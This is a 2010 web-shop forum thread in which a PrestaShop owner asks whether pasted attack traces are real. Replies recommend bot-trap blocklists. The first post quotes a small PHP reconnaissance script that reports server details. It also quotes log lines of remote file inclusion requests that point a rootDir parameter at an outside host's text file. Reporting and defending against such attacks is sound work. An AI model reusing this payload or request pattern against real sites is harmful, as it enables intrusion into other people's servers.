Hacktor Posted November 19, 2010 Share Posted November 19, 2010 With this piece of code did they attack my Prestashop webshop. Is this true or fake???? I think its for CubeCart???<?$win = strtolower(substr(PHP_OS,0,3)) == "win";echo "shepdoy ";if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on"){ $safemode = true; $hsafemode = "4ON(BuSuK)6";}else {$safemode = false; $hsafemode = "3OFF(WoKeH)6";}$xos = wordwrap(php_uname(),90," ",1);$xpwd = @getcwd();$OS = "[safe-mode:".$hsafemode."] [Kernel:".$xos."]";echo " shepdoy ";echo " OSTYPE:$OS ";echo " Pwd:$xpwd ";die(" Karaw4nghacK Was Here!!!");?>93.189.33.175 - - [19/Nov/2010:18:11:12 +0100] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob;[rootDir]=http://anten.zoomshare.com/files/scanner/id.txt?? HTTP/1.1" 404 1547 "-" "libwww-perl/5.805"217.113.59.4 - - [19/Nov/2010:18:11:31 +0100] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob;[rootDir]=http://anten.zoomshare.com/files/scanner/id.txt?? HTTP/1.1" 404 1547 "-" "libwww-perl/5.836"74.63.64.4 - - [19/Nov/2010:18:26:40 +0100] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob;[rootDir]=http://anten.zoomshare.com/files/scanner/id.txt?? HTTP/1.1" 404 1547 "-" "libwww-perl/5.813" Link to comment Share on other sites More sharing options...
guest* Posted November 25, 2010 Share Posted November 25, 2010 If your site was really hacked, than make your server secure. The UA libww-perl is a known agent for hacking issues. If you cannot do it by yourself, i.e. secure your server, so don't allow bot-attacks on your own projects. Honeypotproject f.ex. is one of this tools. As I'm a german spoken user I use bot-trap and this works effective on a rate of 99,99%. The only thing what you have to do is to load folder per ftp to server and include code in your index-site. And also update the blacklist by cronjob or manually daily to be update.The IP 74.63.64.4 is known on both projects that comes from an insecure server, i.e. (Tor)proxy-server and they block automatically anything comes from there. Link to comment Share on other sites More sharing options...
makaraci Posted November 27, 2010 Share Posted November 27, 2010 Hi cd2500,can you explain how can i install and use bot trap ?is there english alternative for bot trap ? I dont speak German, sorry.And what is cron job ? How can i use it ?? Link to comment Share on other sites More sharing options...
guest* Posted November 28, 2010 Share Posted November 28, 2010 @makaraci - check your PN's Link to comment Share on other sites More sharing options...
makaraci Posted November 29, 2010 Share Posted November 29, 2010 thanks pal Link to comment Share on other sites More sharing options...
jesa Posted May 2, 2012 Share Posted May 2, 2012 Hi cd2500, can you explain how can i install and use bot trap ? is there english alternative for bot trap ? I dont speak German. thanks Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now